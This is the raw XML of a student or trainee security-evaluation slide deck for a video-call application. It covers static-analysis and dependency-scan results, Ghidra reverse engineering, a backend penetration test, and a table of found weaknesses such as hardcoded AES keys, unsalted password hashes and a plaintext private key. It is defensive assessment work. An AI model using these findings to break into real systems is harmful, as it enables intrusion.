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31"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="285" r:id="rId4"/>
    <p:sldId id="337" r:id="rId5"/>
    <p:sldId id="336" r:id="rId6"/>
    <p:sldId id="366" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="335" r:id="rId9"/>
    <p:sldId id="359" r:id="rId10"/>
    <p:sldId id="360" r:id="rId11"/>
    <p:sldId id="361" r:id="rId12"/>
    <p:sldId id="363" r:id="rId13"/>
    <p:sldId id="357" r:id="rId14"/>
    <p:sldId id="367" r:id="rId15"/>
    <p:sldId id="364" r:id="rId16"/>
    <p:sldId id="341" r:id="rId17"/>
    <p:sldId id="342" r:id="rId18"/>
    <p:sldId id="343" r:id="rId19"/>
    <p:sldId id="345" r:id="rId20"/>
    <p:sldId id="323" r:id="rId21"/>
    <p:sldId id="350" r:id="rId22"/>
    <p:sldId id="353" r:id="rId23"/>
    <p:sldId id="351" r:id="rId24"/>
    <p:sldId id="355" r:id="rId25"/>
    <p:sldId id="354" r:id="rId26"/>
    <p:sldId id="356" r:id="rId27"/>
    <p:sldId id="365" r:id="rId28"/>
    <p:sldId id="331" r:id="rId29"/>
    <p:sldId id="332" r:id="rId30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FCC3FC-8A63-4E00-9838-D5161C452230}">
  <a:tblStyle styleId="{6BFCC3FC-8A63-4E00-9838-D5161C45223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0CAC5E1-7389-4E8F-895F-8665422600D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6780A3-A0DD-4631-A506-09B27146AE5F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222" y="10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6171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476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4453124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60084053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215383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0738167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718288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1329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693161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640973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03955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578365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802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8515318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3927303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96644831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97838646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5617403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29183771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9548343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5924770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5392443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963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95301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311574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887380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7331910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403048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5508580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783966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418320" y="646303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715892" y="230188"/>
            <a:ext cx="1275815" cy="36512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0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t.co/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20.119.70.194:81/b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3.png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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563201" y="4560135"/>
            <a:ext cx="3644972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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="45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4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431121" y="1508751"/>
            <a:ext cx="7552504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Security Evaluation</a:t>
            </a:r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5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Phase 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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Presentation</a:t>
            </a:r>
            <a:endParaRPr sz="3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69" y="4502068"/>
            <a:ext cx="2945100" cy="84285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757591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Static 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Analysis and Open Source Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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65551" y="924372"/>
            <a:ext cx="5515817" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill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Tried to find vulnerable point by using automated tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" latinLnBrk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Criteria to select static analysis tool</a:t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en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Supported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Language : C/C++</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Combination of local tool and cloud tool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Need to check open source vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" latinLnBrk="1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 latinLnBrk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Local tools : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Visual studio code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>analysis, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Cppcheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> (Our team had experience on this tool)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" latinLnBrk="1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 latinLnBrk="1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 latinLnBrk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Cloud tool : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>SonarCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(familiar through this training course)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" latinLnBrk="1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 latinLnBrk="1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 latinLnBrk="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Opensource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> vulnerability check : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Snyk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(familiar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>through this training course)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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4135" y="1132742"/>
            <a:ext cx="2824185" cy="69069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94135" y="3287348"/>
            <a:ext cx="4094828" cy="89996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94135" y="4499433"/>
            <a:ext cx="3001165" cy="147698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4135" y="2169964"/>
            <a:ext cx="4725274" cy="1016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7372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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static Analysis (Sonar Cloud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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="그룹 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="392425" y="1527652"/>
            <a:ext cx="6776238" cy="2369257"/>
            <a:chOff x="342900" y="2738437"/>
            <a:chExt cx="10325100" cy="3914775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="그림 9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" y="2738437"/>
              <a:ext cx="10325100" cy="3914775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="모서리가 둥근 직사각형 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="342900" y="4148082"/>
              <a:ext cx="1741296" cy="1095483"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="21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5505450" y="4148082"/>
              <a:ext cx="2141345" cy="1095483"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="21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모서리가 둥근 직사각형 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="342900" y="2895518"/>
              <a:ext cx="1741296" cy="1095483"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="21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304132" y="1049580"/>
            <a:ext cx="5630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Result of all Code ( team2 + open source )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337951" y="3935191"/>
            <a:ext cx="43243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dirty="0" smtClean="0"/>
              <a:t>Team2’s source only</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="그룹 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="266700" y="4219395"/>
            <a:ext cx="11017520" cy="2487374"/>
            <a:chOff x="342899" y="884476"/>
            <a:chExt cx="11017520" cy="2487374"/>
          </a:xfrm>
        </p:grpSpPr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42899" y="884476"/>
              <a:ext cx="11017520" cy="2487374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="모서리가 둥근 직사각형 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="904875" y="1714500"/>
              <a:ext cx="10455544" cy="371475"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="25000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="2857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모서리가 둥근 직사각형 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7074040" y="1366576"/>
              <a:ext cx="341644" cy="884255"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D050">
                <a:alpha val="21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7415684" y="1366576"/>
              <a:ext cx="813916" cy="884255"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D050">
                <a:alpha val="21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모서리가 둥근 직사각형 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8951784" y="1342397"/>
              <a:ext cx="935793" cy="884255"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D050">
                <a:alpha val="21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23" name="타원 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781758" y="1327204"/>
            <a:ext cx="5123445" cy="185005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By additional review on the findings, there was no directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploitable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities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7781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651906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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open source vulnerability (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Snyk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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="그림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973" y="1650062"/>
            <a:ext cx="7744295" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="그룹 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="78501" y="2965361"/>
            <a:ext cx="4303459" cy="2743201"/>
            <a:chOff x="1381754" y="2223617"/>
            <a:chExt cx="6779652" cy="4038600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="그림 2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81754" y="2334149"/>
              <a:ext cx="2562225" cy="1533525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="그림 28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18231" y="2223617"/>
              <a:ext cx="2543175" cy="4038600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="모서리가 둥근 직사각형 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3415917" y="2334149"/>
              <a:ext cx="528062" cy="1614853"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="21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모서리가 둥근 직사각형 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7633344" y="2334149"/>
              <a:ext cx="528062" cy="3928068"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="21000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="2540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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4865377" y="2440637"/>
            <a:ext cx="6553663" cy="3913942"/>
            <a:chOff x="241159" y="644617"/>
            <a:chExt cx="11197213" cy="6086582"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="그림 3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241159" y="644617"/>
              <a:ext cx="10704845" cy="3526486"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="그림 34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426865" y="3269344"/>
              <a:ext cx="10011507" cy="3461855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="직선 연결선 35"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016354" y="1426868"/>
              <a:ext cx="821022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연결선 36"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2130251" y="3960727"/>
              <a:ext cx="821022" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="0070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38" name="직선 화살표 연결선 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1771643" y="3384662"/>
            <a:ext cx="3188124" cy="291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1346753" y="3208066"/>
            <a:ext cx="401935" cy="353193"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill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0" name="직사각형 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1833008" y="2704107"/>
            <a:ext cx="2192115" cy="503476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050">
              <a:alpha val="51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2 of high Severity </a:t>
            </a:r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481087" y="1013703"/>
            <a:ext cx="5575253" cy="1468495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CVEs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from open source library. However, there was no finding on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source newly added </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>team2.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All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findings were from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opencv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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8101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670112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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse engineering &amp; Penetration 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test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="TextBox 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216709" y="1017973"/>
            <a:ext cx="647290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Reverse engineering</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the complete source code, reverse engineering is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>need</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- However, our team tried this because it was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>interesting to see how an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>get any valuable information without the source code (We found this technique and experience to be quite valuable)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Our team used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Ghidra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tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>engineering</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>valuable information from reverse engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>was used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>our penetration testing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 fontAlgn="base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Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>test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Our team tried to conduct penetration testing on backend server because the server was key entity for user authentication and video call communication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- By reviewing the source code, input validation check by backend server was found as a vulnerable point and it was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>targeted for this test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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88857" y="1244263"/>
            <a:ext cx="2123461" cy="1471444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="직선 화살표 연결선 70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409356" y="3885709"/>
            <a:ext cx="2008065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6" name="그림 3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50588" y="5109175"/>
            <a:ext cx="949395" cy="1718980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="그림 3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84853" y="4496124"/>
            <a:ext cx="781663" cy="796904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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56756" y="3194874"/>
            <a:ext cx="1752600" cy="1047750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="그림 8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08920" y="3194874"/>
            <a:ext cx="1752600" cy="1047750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="직선 화살표 연결선 71"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9625940" y="4292896"/>
            <a:ext cx="990107" cy="941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70" name="직선 화살표 연결선 69"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8210730" y="4292896"/>
            <a:ext cx="1415210" cy="941724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17893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2718486" y="2283108"/>
            <a:ext cx="7381103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Reported Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="4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3974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670112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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary of vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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4359622"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="398207" y="935084"/>
          <a:ext cx="8347586" cy="5824632"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{6BFCC3FC-8A63-4E00-9838-D5161C452230}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="562202"/>
                <a:gridCol w="4072772"/>
                <a:gridCol w="1697788"/>
                <a:gridCol w="792993"/>
                <a:gridCol w="1221831"/>
              </a:tblGrid>
              <a:tr h="1689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No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Vulnerability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Approach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Impact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CIA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337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V01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encryption key and initial vector for AES encryption algorithm were hardcoded in the source code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Code Review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Medium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Confidentiality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50687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V02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When hashing user password with SHA256, salt is not used. Using this, user password change attacks are possible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Code Review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Confidentiality</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Integrity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1689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V03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When registering new user, it doesn't require 2FA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Design Review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Medium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Integrity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337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V04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Service application for backend server and video call application can be run in one application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Design Review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Integrity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337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V05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User information is stored as file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Design Review</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Code Review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Confidentiality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1689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V06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Video call is still connected after log out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Runtime Analysis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Medium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Integrity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499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V07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Video call packet data is not secured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Runtime Analysis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Confidentiality</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Integrity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517341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V08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Server private key and certificate were stored as plain text in project folder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Runtime Analysis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Confidentiality</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Integrity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430706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V09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The initial password for server administrator was set with easy rule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Runtime Analysis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Confidentiality</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Integrity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499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V10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Hash value for password is printed in console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Runtime Analysis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Confidentiality</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Integrity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499144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V11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TLS Version Verification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Runtime Analysis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Confidentiality</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
